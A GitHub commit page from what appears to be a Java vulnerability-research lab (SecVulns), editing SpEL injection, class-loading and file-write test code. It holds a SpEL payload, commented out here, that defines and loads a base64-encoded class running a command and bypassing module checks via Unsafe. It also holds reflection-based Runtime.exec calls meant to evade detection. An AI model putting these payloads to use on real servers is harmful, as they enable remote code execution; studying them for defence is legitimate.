Skip to content

Commit 021f6c4

Browse files
WhoopsunixWhoopsunix
committed
delete error code
1 parent dd3ddab commit 021f6c4

File tree

4 files changed

+27
-42
lines changed

4 files changed

+27
-42
lines changed

SecVulns/Springboot2/src/main/java/com/ppp/springboot/vul/code/AviatorScriptController.java

-33
This file was deleted.

SecVulns/VulnCore/Expression/SPELAttack/src/main/java/com/ppp/spel/SPELAttack.java

+6-5
Original file line numberDiff line numberDiff line change
@@ -54,12 +54,13 @@ public static void main(String[] args) {
5454
// System.out.println(obj);
5555

5656

57-
// 添加 module 后二次加载 unnamed module 报错调试
58-
String test1 = "{T(org.springframework.cglib.core.ReflectUtils).defineClass('org.springframework.expression.Test3',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQAfAoAFAA7CQA8AD0IAD4KAD8AQAoAQQBCCABDCgBBAEQHAEUIAEYKABAARwgASAoAEABJCgBKAEsKAEoATAcATQcATggATwoAEABQCgBRAEsHAFIKAFEAUwcAVAgAMgoADwBVCABWCQBXAFgKABAAWQoAVwBaCgAWAFsKABYAOwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAmTG9yZy9zcHJpbmdmcmFtZXdvcmsvZXhwcmVzc2lvbi9UZXN0MzsBAA1TdGFja01hcFRhYmxlBwBUBwBFAQAJYWRkTW9kdWxlAQALdW5zYWZlQ2xhc3MBABFMamF2YS9sYW5nL0NsYXNzOwEAC3Vuc2FmZUZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEABnVuc2FmZQEAEUxzdW4vbWlzYy9VbnNhZmU7AQAGbWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAZtb2R1bGUBABJMamF2YS9sYW5nL09iamVjdDsBAANjbHMBAAZvZmZzZXQBAAFKAQAVZ2V0QW5kU2V0T2JqZWN0TWV0aG9kAQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAKVGVzdDMuamF2YQwAHwAgBwBcDABdAF4BAARFeGVjBwBfDABgAGEHAGIMAGMAZAEAFm9wZW4gLWEgQ2FsY3VsYXRvci5hcHAMAGUAZgEAE2phdmEvbGFuZy9FeGNlcHRpb24BAA9zdW4ubWlzYy5VbnNhZmUMAGcAaAEACXRoZVVuc2FmZQwAaQBqBwBrDABsAG0MAG4AbwEAD3N1bi9taXNjL1Vuc2FmZQEAD2phdmEvbGFuZy9DbGFzcwEACWdldE1vZHVsZQwAcABxBwByAQAQamF2YS9sYW5nL09iamVjdAwAcwB0AQAkb3JnL3NwcmluZ2ZyYW1ld29yay9leHByZXNzaW9uL1Rlc3QzDAB1AHYBAA9nZXRBbmRTZXRPYmplY3QHAHcMAHgAKwwAeQBxDAB6AHsMACkAIAEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABFvYmplY3RGaWVsZE9mZnNldAEAHChMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7KUoBAA5qYXZhL2xhbmcvTG9uZwEABFRZUEUBAAlnZXRNZXRob2QBAAd2YWx1ZU9mAQATKEopTGphdmEvbGFuZy9Mb25nOwAhABYAFAAAAAAAAwABAB8AIAABACEAAAB2AAIAAgAAABoqtwABsgACEgO2AAS4AAUSBrYAB1enAARMsQABAAQAFQAYAAgAAwAiAAAAGgAGAAAADAAEAA4ADAAPABUAEQAYABAAGQASACMAAAAMAAEAAAAaACQAJQAAACYAAAAQAAL/ABgAAQcAJwABBwAoAAAJACkAIAABACEAAAFMAAcACQAAAI0SCbgACksqEgu2AAxMKwS2AA0rAbYADsAAD00SEBIRA70AELYAEk4tBLYAEy0SFAO9ABS2ABU6BBIWOgUsEhASF7YADLYAGDcGKhIZBr0AEFkDEhRTWQSyABpTWQUSFFO2ABs6CBkIBLYAExkILAa9ABRZAxkFU1kEFga4ABxTWQUZBFO2ABVXpwAES7EAAQAAAIgAiwAIAAMAIgAAAD4ADwAAABsABgAcAA0AHQASAB4AGwAfACcAIAAsACEAOAAiADwAIwBJACQAZQAlAGsAJgCIACkAiwAnAIwAKgAjAAAAUgAIAAYAggAqACsAAAANAHsALAAtAAEAGwBtAC4ALwACACcAYQAwADEAAwA4AFAAMgAzAAQAPABMADQAKwAFAEkAPwA1ADYABgBlACMANwAxAAgAJgAAAAkAAvcAiwcAKAAACAA4ACAAAQAhAAAALAACAAAAAAAMuAAduwAWWbcAHlexAAAAAQAiAAAADgADAAAAFQADABYACwAXAAEAOQAAAAIAOg=='),T(java.lang.Thread).currentThread().getContextClassLoader(), null, T(java.lang.Class).forName('org.springframework.expression.ExpressionParser'))}";
59-
String load = "{T(java.lang.Thread).currentThread().getContextClassLoader().loadClass('org.springframework.expression.Test3').newInstance()}";
57+
// // 添加 module 后二次加载 unnamed module 报错调试
58+
// String test1 = "{T(org.springframework.cglib.core.ReflectUtils).defineClass('org.springframework.expression.Test3',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQAfAoAFAA7CQA8AD0IAD4KAD8AQAoAQQBCCABDCgBBAEQHAEUIAEYKABAARwgASAoAEABJCgBKAEsKAEoATAcATQcATggATwoAEABQCgBRAEsHAFIKAFEAUwcAVAgAMgoADwBVCABWCQBXAFgKABAAWQoAVwBaCgAWAFsKABYAOwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAmTG9yZy9zcHJpbmdmcmFtZXdvcmsvZXhwcmVzc2lvbi9UZXN0MzsBAA1TdGFja01hcFRhYmxlBwBUBwBFAQAJYWRkTW9kdWxlAQALdW5zYWZlQ2xhc3MBABFMamF2YS9sYW5nL0NsYXNzOwEAC3Vuc2FmZUZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEABnVuc2FmZQEAEUxzdW4vbWlzYy9VbnNhZmU7AQAGbWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAZtb2R1bGUBABJMamF2YS9sYW5nL09iamVjdDsBAANjbHMBAAZvZmZzZXQBAAFKAQAVZ2V0QW5kU2V0T2JqZWN0TWV0aG9kAQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAKVGVzdDMuamF2YQwAHwAgBwBcDABdAF4BAARFeGVjBwBfDABgAGEHAGIMAGMAZAEAFm9wZW4gLWEgQ2FsY3VsYXRvci5hcHAMAGUAZgEAE2phdmEvbGFuZy9FeGNlcHRpb24BAA9zdW4ubWlzYy5VbnNhZmUMAGcAaAEACXRoZVVuc2FmZQwAaQBqBwBrDABsAG0MAG4AbwEAD3N1bi9taXNjL1Vuc2FmZQEAD2phdmEvbGFuZy9DbGFzcwEACWdldE1vZHVsZQwAcABxBwByAQAQamF2YS9sYW5nL09iamVjdAwAcwB0AQAkb3JnL3NwcmluZ2ZyYW1ld29yay9leHByZXNzaW9uL1Rlc3QzDAB1AHYBAA9nZXRBbmRTZXRPYmplY3QHAHcMAHgAKwwAeQBxDAB6AHsMACkAIAEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABFvYmplY3RGaWVsZE9mZnNldAEAHChMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7KUoBAA5qYXZhL2xhbmcvTG9uZwEABFRZUEUBAAlnZXRNZXRob2QBAAd2YWx1ZU9mAQATKEopTGphdmEvbGFuZy9Mb25nOwAhABYAFAAAAAAAAwABAB8AIAABACEAAAB2AAIAAgAAABoqtwABsgACEgO2AAS4AAUSBrYAB1enAARMsQABAAQAFQAYAAgAAwAiAAAAGgAGAAAADAAEAA4ADAAPABUAEQAYABAAGQASACMAAAAMAAEAAAAaACQAJQAAACYAAAAQAAL/ABgAAQcAJwABBwAoAAAJACkAIAABACEAAAFMAAcACQAAAI0SCbgACksqEgu2AAxMKwS2AA0rAbYADsAAD00SEBIRA70AELYAEk4tBLYAEy0SFAO9ABS2ABU6BBIWOgUsEhASF7YADLYAGDcGKhIZBr0AEFkDEhRTWQSyABpTWQUSFFO2ABs6CBkIBLYAExkILAa9ABRZAxkFU1kEFga4ABxTWQUZBFO2ABVXpwAES7EAAQAAAIgAiwAIAAMAIgAAAD4ADwAAABsABgAcAA0AHQASAB4AGwAfACcAIAAsACEAOAAiADwAIwBJACQAZQAlAGsAJgCIACkAiwAnAIwAKgAjAAAAUgAIAAYAggAqACsAAAANAHsALAAtAAEAGwBtAC4ALwACACcAYQAwADEAAwA4AFAAMgAzAAQAPABMADQAKwAFAEkAPwA1ADYABgBlACMANwAxAAgAJgAAAAkAAvcAiwcAKAAACAA4ACAAAQAhAAAALAACAAAAAAAMuAAduwAWWbcAHlexAAAAAQAiAAAADgADAAAAFQADABYACwAXAAEAOQAAAAIAOg=='),T(java.lang.Thread).currentThread().getContextClassLoader(), null, T(java.lang.Class).forName('org.springframework.expression.ExpressionParser'))}";
59+
// String load = "{T(java.lang.Thread).currentThread().getContextClassLoader().loadClass('org.springframework.expression.Test3').newInstance()}";
60+
// eval(test1);
61+
// eval(load);
6062

61-
eval(test1);
62-
eval(load);
63+
eval(classLoad2);
6364

6465
}
6566

SecVulns/VulnCore/FilesOperations/src/main/java/com/ppp/FileWrite.java

+13-2
Original file line numberDiff line numberDiff line change
@@ -8,9 +8,13 @@
88
public class FileWrite {
99

1010
public static void main(String[] args) throws Exception{
11-
String path = "/tmp/1.txt";
11+
// String path = "/tmp/1.txt";
12+
String name = "123.jsp";
13+
// name = "123";
14+
String path = "/tmp/"+ name + ".txt";
15+
1216
String content = "Hello Whoopsunix!";
13-
FileWrite.write_FileOutputStream_file(path, content);
17+
FileWrite.write_DataOut(path, content);
1418
}
1519

1620
/**
@@ -114,4 +118,11 @@ public static void write_Files(String filePath, String context) throws Exception
114118
public static void write_FileUtils(String filePath, String context) throws Exception {
115119
org.apache.commons.io.FileUtils.writeStringToFile(new File(filePath), context, "UTF-8");
116120
}
121+
122+
public static void write_DataOut(String filePath, String context) throws Exception {
123+
FileOutputStream fileOutputStream = new FileOutputStream(filePath);
124+
DataOutputStream dataOutputStream = new DataOutputStream(fileOutputStream);
125+
dataOutputStream.writeUTF(context);
126+
127+
}
117128
}

SecVulns/VulnCore/Serialization/ClassLoad/src/main/java/org/springframework/expression/Test3.java

+8-2
Original file line numberDiff line numberDiff line change
@@ -10,10 +10,16 @@
1010
*/
1111
public class Test3 {
1212
public Test3() {
13+
// Runtime.getRuntime().exec("open -a Calculator.app");
14+
// 反射调用
1315
try {
14-
System.out.println("Exec");
15-
Runtime.getRuntime().exec("open -a Calculator.app");
16+
Class cls = Class.forName("java.lang.Runtime");
17+
Method method = cls.getDeclaredMethod("getRuntime");
18+
Object obj = method.invoke(null);
19+
method = cls.getDeclaredMethod("exec", String.class);
20+
method.invoke(obj, "open -a Calculator.app");
1621
} catch (Exception e) {
22+
e.printStackTrace();
1723
}
1824
}
1925

0 commit comments

Comments
 (0)